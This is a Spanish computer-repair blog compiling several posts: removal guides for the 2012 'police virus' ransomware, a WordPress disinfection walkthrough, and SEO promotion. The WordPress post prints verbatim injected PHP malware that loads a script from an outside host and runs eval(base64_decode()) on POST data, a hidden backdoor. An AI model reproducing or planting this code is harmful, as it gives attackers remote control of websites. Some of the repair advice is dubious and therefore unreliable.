VIRUS POLICIA 2012 – SOLUCION EN 5 PASOS

Virus policia junio 2012 -Ya hace tiempo que por casualidad nos encontramos con es famoso virus de la policia que en post anteriores comentamos, la casualidad quiso que fuéramos de los primeros en encontrarnos con el con lo que tuvimos que investigar para solucionarlo ya que no había información en ningun sitio para ayudar a la solución, pero finalmente dimos con la solución y por lo que sabemos a muchos os ha venido muy bien la informacion que proporcionabamos.

Ahora este virus ha evolucionado muchisimo y lo que anteriormente era relativamente sencillo ahora se trata de un virus dañino en toda regla, y la casualidad a querido que seamos de los primeros en solucionarlo nuevamente, pero sin mas dilaciones pasamos a explicaros como solucionar el virus policia junio 2012.

COMO SIEMPRE OS RECOMENDAMOS QUE UN TECNICO ESPECIALIZADO SEA QUIEN SOLUCIONE EL PROBLEMA O QUE TRAIGAIS EL EQUIPO A NUESTRAS INSTALACIONES.

Uno de los mayores problemas de este virus es que ademas según hemos investigado puede llegar a dañar sistemas linux o mac aunque solo en el renombre de archivos sin dar mensaje de aviso virus policía ni nada parecido, simplemente deja de funcionar el sistema por el renombre y encriptacion por lo que habrá que coger el disco y conectarlo a otro equipo para conseguir desencriptarlos con la herramienta que os explicamos.

Lo primero que encontrareis sera una pantalla como esta:

Virus Policia Junio 2012 – Este tipo de mensaje lo encontrareis en cualquier modo de arranque por lo que ya se complica la cosa, ademas en el caso que tratamos incluso en modo seguro nos da un pantallazo azul en el cual no podemos continuar, para solucionar el inconveniente de no poder arrancar en modo seguro reinstalamos el sistema. Seguidamente como os comentaba en modo seguro tambien nos salia el mensaje.

Importante Virus Policia Junio 2012 : Aunque os arranque en modo seguro y no haya sido necesario la reinstalacion del sistema es MUY IMPORTANTE que realiceis la reinstalacion del sistema porque en caso contrario no podreis eliminar el virus de forma total.

Otra cosa importante es que todas las utilidades que describo las descargueis desde un PC limpio y las ejecuteis desde un pendrive ya que probablemente la conexion a internet esta dañada aunque tambien la solucionaremos.

Las curiosidades de el mensaje es que no deja realizar ninguna accion, ni alt+f4 ni ctrl+alt+supr ni ctrl+alt ni nada por el estilo, la unica opcion es apagar el sistema a las bravas.

Virus Policia Junio 2012 – Manos a la obra:

1º Virus Policia Junio 2012 – Lo primero sera realizar un analisis con un livecd, nosotros hemos usado uno que es sencillo encontrar por internet y de manera gratuita como es AVIRA, lo grabamos en un cd y arrancamos con el. Lo podeis descargar de aqui.

Es importantisimo poner AVIRA en español una vez arrancado y actualizarlo via internet, la cuestion de ponerlo en español es muy muy muy importante porque ademas de enterarnos mejor de todo el proceso si no seleccionamos este idioma habra entradas en el registro que no podra detectar ni eliminar.

En las opciones de AVIRA es necesario que marquemos «eliminar archivos si no es posible la desinfeccion».

Realizamos el analisis y una vez terminado os detectara una media de 7-10 infecciones, despues apagamos el equipo.

2º Virus Policia Junio 2012 – Cuando arranquemos el equipo encontraremos que el virus «supuestamente» esta eliminado, pero no es asi.

Nos aparecera un mensaje en el que dice que hay un problema con Microsoft feeds sync, para solucionarlo abrimos  la linea de comando pulsando en inicio/ejecutar y escribimos «CMD» . Al aparecer la linea de comando tendremos que escribir «msfeedssync disable», con esto solucionamos este inconveniente y no volvera a aparecer.

3º Virus Policia Junio 2012 – Si explorais vuestros archivos vereis que todos han sido renombrados, y cuando digo todos es TODOS. No se os ocurra ir archivo por archivo cambiando el nombre porque ademas de tardar una eternidad no estareis solucionando el problema ya que ademas de renombrados estos archivos tienen encriptado el virus para volverse a propagar.

Encontrareis todos los archivos de la siguiente manera…

Archivo original: pepito.jpg
Archivo encriptado: locked-pepito-jdgg.jpg-alfg

Todos los archivos empezaran con la palabra locked y terminaran con una serie aleatoria de caracteres.

Para solucionarlo necesitaremos un archivo no infectado y otro que si este infectado.

Recordad que al principio os decia que era MUY IMPORTANTE hacer una reinstalacion del sistema, esto era ademas de para solucionar los problemas de arranque  para poder tener archivos no infectados como las imagenes de muestra de windows.

Descargamos el programa Rannohdecryptor de aqui.

Una vez descargado lo ejecutamos y «change parameters» marcamos la opcion «Delete crypted files after decryption«. 

Pulsamos «start scan» y nos solicitara primero un archivo libre de virus, para ello iremos a «mis documentos/mis imagenes/imagenes de muestra» y seleccionaremos «nenúfares.jpg», despues nos solicita el mismo archivo infectado y volvemos a la misma ruta y seleccionamos «locked-nenúfares.jpg.asdg».

Esperaremos un rato mientras el software realiza su trabajo que no es otro que comparar los archivos para conseguir el sistema de encriptacion y con esa muestra eliminar la encriptacion y renombrado de todos los archivos que encuentre en el sistema, seguidamente eliminara el solito las copias de archivos infectados.

4º Virus Policia Junio 2012 – Otra de las caracteristicas del virus es que nos elimina el acceso a internet  para evitar la descarga de herramientas por esta razon os decia que debeis descargar las herramientas en otro equipo.

Para eliminar el bloqueo de internet es sencillo:

Entramos en Internet Explorer y abrimos «herramientas/opciones de internet/Conexiones/Configuracion de Lan» y quitamos la opcion «usar un servidor proxy». Ya tenemos acceso a internet.

5º Virus Policia Junio 2012 – Descargamos Malwarebytes Antimalware de nuestros amigos de Infospyware. Lo instalamos y actualizamos.

Realizamos un analisis «completo» y cuando termine seleccionamos «eliminar todos los elementos»

Este ultimo paso lo hemos realizado para asegurar que no queda nada infectado y si lo hay lo limpiamos pero ademas para eliminar un troyano que viene acompañando al virus de la policia de este junio 2012 el cual nos bloquea cualquier tipo de acceso a opciones de sistema. Los sintomas son que no podremos abrir ni «msconfig» ni «administrador de tareas» ni «regedit» , con esto lo solucionamos.

Terminado el analisis reiniciamos el equipo y ya con acceso a msconfig eliminamos las entradas de inicio que nos resulten sospechosas.

Se recomienda que terminado todo el proceso se realice una limpieza con CCLEANER  tanto de sistema como de registro.

VIRUS EXTERMINADO!!!!

Espero que os haya servido este tutorial sobre como eliminar el virus policia junio 2012, comentar amigos.

 Actualización 18/10/2012:

Parece ser que ha vuelto a mutar este virus e incluso en algunos casos también ha cambiado la estética pareciendo ser un virus de la SGAE, gracias a un compañero os dejamos una imagen de como aparece actualmente, los pasos para desinfectarlo son los mismo que tenemos descritos en el post.

Eliminar infeccion en wordpress de htaccess e inyeccion de codigo

He tenido ataques muy importantes en la web de un cliente basada en WordPress los cuales se basaban en que modificaban el .htaccess e insertaban archivos del tipo wXXXXXXXXw.php con numero aleatorios en las X. Sinceramente es de las pocas veces que algo me ha quitado el sueño y nunca mejor dicho porque he tenido que estar constantemente pendiente de esta web ya que le estamos realizando posicionamiento y como sabeis si google detecta que tienes una infeccion el posicionamiento se pierde, con lo cual fuera la hora que fuera he tenido que estar limpiando el .htaccess y eliminando los archivos wXXXXXXXXw.php del hosting continuamente para evitar que fueran detectados.

Cuando digo que me ha quitado el sueño es porque me he estado acostanto a las 4 o 5 de la mañana ya que limpiaba los archivos y se volvian a infectar pero finalmente he dado con la solucion y como no la he encontrado por internet creo que este post sera de gran ayuda para webmasters como yo que estan en la situacion anteriormente descrita.

ANTECEDENTES:

Este cliente tenia una web html (normal) y un dia contrato posicionamiento seo con cierta guia telefonica que como ya conocemos muchos SEO crean una pagina paralela y la posicionan pero para ello clonan la original y encargan el trabajo de posicionamiento a personal «SEO» de otros paises, en este caso hemos detectado que eran rusos.

A partir de ese dia de repente su web desaparecio y era inaccesible ni por buscadores ni por la propia direccion, es mas google decia que tenia malware. Esta fue la razon de ponerse en contacto con nosotros. La infeccion redireccionaba su web a una pagina rusa .ru de que hacia inaccesible la propia web del cliente, es una tecnica muy utilizada por gente que se dice llamar SEO y en realidad son HACKERS.

Detectamos los cambios que os pongo al principio del post y supuestamente reparo el problema pero el problema venia cuando cada 2 dias se volvia a infectar, entonces decidimos tirar la web abajo y volver a crear una nueva.

ACTUALMENTE:

Al cliente le creamos una web con muchisima calidad basada en wordpress y lo unico que mantuvimos fue una carpeta que tenia de su tienda online ( GRAVE ERROR ) . La pagina empezo a funcionar y le estamos realizando como hemos dicho posicionamiento seo.

EL PROBLEMA:

El problema ha venido cuando nos ha vuelto a dañar la misma infeccion, algo que a priori era extraño al tener nueva web pero nada extraño por lo que explicare mas adelante.

Buscando informacion sobre esta infeccion todo el mundo hablaba de los problemas de wordpress por insercion de codigo e inyeccion sql y os puedo asegurar que hemos probado todas las supuestas soluciones que daban en foros y blogs pero ninguna funcionaba, siempre ocurria lo mismo, en 2 dias la web se infectaba de nuevo.

Hemos probado de todo:

-Eliminar el contenido modificado de .htaccess
-Modificar permisos de archivos y directorios
-Instalar plugins de seguridad para ataques
-Proteger por .htaccess archivos
-Limitar por .htaccess el acceso de ciertos paises como rusia y china
-Eliminar todo y volverlo a crear
-Descargar el contenido y analizarlo con antimawares y antivirus (sin encontrar nada)
-Busqueda de timbthumb y un sin fin de cosas

LA SOLUCION DEFINITIVA:

Finalmente hemos dado con la solucion y la quiero compartir porque se los dolores de cabeza que os puede llegar a dar.

No me voy a explayar en como hemos llegado a esta conclusion porque necesitariamos que estubierais leyendo el post 2 dias y no es cuestion de eso, pero ahi va la solucion punto por punto y seguidamente la explicacion de la infeccion.

Desinfeccion:

1. Cambia las contraseñas de usuarios wordpress
2. Cambia las contraseñas de FTP
3. Cambia las contraseñas de bases de datos SQL
4. Descargar todo el contenido del hosting a tu equipo
5. Eliminar el contenido añadido a los .htaccess (en tu equipo)
6. Eliminar los archivos wXXXXXXXXw.php (en tu equipo)
7. Descargar el programa REPLACE TEXT IN MANY FILES
8. Buscar la cadena siguiente con el programa: global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = «lb11»; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = «102»; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo «<script>document.cookie='».$sessdt_k.»=».$sessdt_f.»‘;</script>»; } } else { if($_COOKIE[$sessdt_k]==»102″) { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo «<script>document.cookie='».$sessdt_k.»=».$sessdt_f.»‘;</script>»; } $sessdt_j = @$_SERVER[«HTTP_HOST»].@$_SERVER[«REQUEST_URI»]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = «http://turnitupnow.net/?rnd=».$sessdt_f.substr($sessdt_v,-200); echo «<script src=’$sessdt_u’></script>»; echo «<meta http-equiv=’refresh’ content=’0;url=http://$sessdt_j’><!–«; } } $sessdt_p = «showimg»; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
9. En tipo de archivo marcar *.php y *.html
10. En opcion a realizara marcar REPLACE
11. En el cuadro justo debajo de donde hemos puesto la cadena, simplemente ponemos un espacio
12. Arriba en direccion buscais la carpeta que habeis descargado
13. Pulsar START. Con esto lo que hacemos en sustituir toda la cadena de busqueda por un simple espacio con lo que limpiaremos los archivos de la infeccion.
14. Volver a subir todo el contenido a vuestro hosting
15. SOLUCIONADO

Con esto hemos conseguido que el cliente no se vuelva a infectar.

RAZON DE LA INFECCION:

La infeccion era debida a que como hemos dicho antes a que habia sido hackeado con anterioridad y en la carpeta que habiamos dejado (la de tienda) tenia todos los archivos php infectados con este codigo, de tal manera que cada 2 dias el codigo volvia a crear las modificaciones en htaccess, los archivos wXXXXXXXXw.php e infectaba todos los archivos php y html con el mismo codigo.

Al eliminar el codigo de todos los archivos se ha quedado solucionado, espero que os sirva , especialmente la utilidad de remplazamiento de texto porque en nuestro caso estuvimos cerca de 6 horas reemplazando el texto archivo por archivo manualmente y como os podeis imaginar nos ha sido de gran utilidad cuando la hemos encontrado.

SUERTE CON LA DESINFECCION

En tiempos como los que corren los expertos dicen que la mejor inversion es en publicidad y realmente no se equivocan ya que los clientes finales buscan mas que nunca y comparan continuamente.

La mejor alternativa de publicidad para un negocio es la autopublicidad, que no es mas que publicitar tu propia empresa sin depender de otros como puedan ser guías telefonicas u otros medios como television, prensa, etc…

Las posibilidades publicitarias son muchas pero la unica que funciona actualmente es tener tu propia pagina web, aunque no sirve con tan solo tener una web. Lo mas importante es que tus clientes encuentren tu negocio y para ello es necesario el posicionamiento seo.

Para que entendais lo que es posicionamiento seo hemos creado un video que es la realidad tal y como ocurre diariamente con clientes que se interesan por el posicionamiento seo.

Estrenamos los post de este año con un curioso virus que hemos tenido que tratar pero que por desgracia se esta expandiendo rapidamente por toda españa.

La pantalla que vereis sera algo parecido a esto:

En el mensaje bloquea totalmente el ordenador y dice que hemos visitado paginas de pornografia las cuales han sido detectadas por la policia, nada mas lejos de la realizada ya que este virus se propaga por visitas a foros y videos de youtube infectados.

La limpieza del virus es sencilla por lo que no lleva demasiado tiempo y no se pierde ningun dato, y aunque hay varias guias para eliminar este virus por los casos que hemos trabajado podemos decir que no sirve simplemente con limpiar el equipo ya que deja una huella oculta que en el momento que volvemos a conectarlo a internet exporta contraseñas y otros datos ademas de volver a infectar el equipo en un plazo medio. Recomendamos la limpieza pero ademas la revision para evitar una nueva infeccion y exportacion de datos tapando los agujeros de seguridad que nuestros tecnicos han detectado.

En el mensaje se dicta que para desbloquear el equipo hay que pagar 100€, no lo hagais ya que ademas tendran vuestros datos.

Como dato importante debemos decir que no esta calificado como un virus y es por esto que ningun antivirus lo detecta, realmente el trabajo que hace es insertar unos ficheros NO DAÑINOS y hacer que el equipo desactive servicios mostrando una pagina web que es el mensaje que veis.

Recomendamos que limpien el equipo o lo traigan al servicio tecnico ya que otra de las cosas detectadas es un trafico constante de datos mientras el mensaje esta en pantalla por lo que probablemente esta exportando datos y no es recomendable tenerlo mucho tiempo en pantalla.

IMPORTANTE: Segun nuestras fuentes no tiene nada que ver con POLICIA NACIONAL O GUARDIA CIVIL  como dice el mensaje asi que NO PAGUEIS LA MULTA.

SOLUCION:

La solucion es sencilla, tan solo debeis reiniciar en modo seguro e instalar malwarebytes , realizais un analisis «completo» y seguidamente ejecutais desde inicio/ejecutar la aplicacion msconfig y desactivais de la seccion inicio los archivos que veais sospechosos o raros.

Para asegurarnos de que hemos limpiado todo es interesante usar cualquier aplicacion de limpieza de registro tales como tuneup o ccleaner.

reiniciar y SOLUCIONADO

ACTUALIZACION 28/02/2012

Nos hemos encontrado con una nueva variante en la que se pide en lugar de 100 euros otro valor que son 50 euros.

Esta variante es un poco mas agresiva ya que en algunos casos no deja iniciar el sistema en modo seguro por lo que hay que realizar una reinstalacion del sistema y seguir con los pasos anteriores de tal manera que los pasos serian los siguientes con una diferencia:

1º Reparacion de sistema o reinstalacion si fuera necesario
2º Iniciar en modo seguro con funciones de red para poder descargar malwarebytes e instalarlo (logicamente actualizar la base)
3º Eliminar todo lo que encuentre pulsando el boton «eliminar seleccionado»
4º SIN REINICIAR instalar Polifix y analizar el sistema
5º SIN REINICIAR instalar combofix y limpiar
6º Eliminar todo el contenido de c:\windows\temp\
7º Usando el comando msconfig quitar todo lo referente a entradas a la carpeta ROAMING
8º Reiniciar y SOLUCIONADO

Espero que os sirva, si me voy encontrado con nuevas variantes os lo ire posteando. Las utilidades polifix y combofix las podeis descargar googleando o en infospyware.

Actualizacion 08/03/2012

Como veo que soleis tener problemas para conseguir las utilidades polifix y combofix os las pongo aqui para que las descargueis con el permiso de los creadores del programa infospyware.

Descargar utilidades virus policia

Actualizacion 09/06/2012

Hay una nueva variante la cual ya tenemos solucionada toda la info en SOLUCIONA VIRUS POLICIA JUNIO 2012

De todos es sabido que google hoy en dia es el mayor buscador del mundo y a su vez una de las mayores empresas si no es la mayor. Pero no es del todo sabido la importancia y la cantidad de informacion que puede almacenar esta buscador.

A traves de los vídeos que os pongo a continuación los cuales son muy interesantes podreis comprobar que potencia puede llegar a generar y por ello la importancia del posicionamiento seo o posicionamiento web. Nuestra experiencia al menos respecto al diseño web y el posicionamiento seo en toledo es que se tarda en conseguir que una pagina este correctamente posicionada pero es logico cuando hoy en dia todo el mundo quiere lo mismo, por esto es que no es recomendable encomendar esta tarea a cualquier empresa sino que es necesario hacerlo a traves de alguna empresa con experiencia en este sector porque si se hace mal los resultados pueden ser totalmente diferentes a lo deseado.

Recuerda que nuestra empresa ademas te ofrece mantenimiento informatico en toledo y reparacion de ordenadores, pero claro esta que este post se lo dedicamos al posicionamiento y a google. Disfrutar de los vídeos.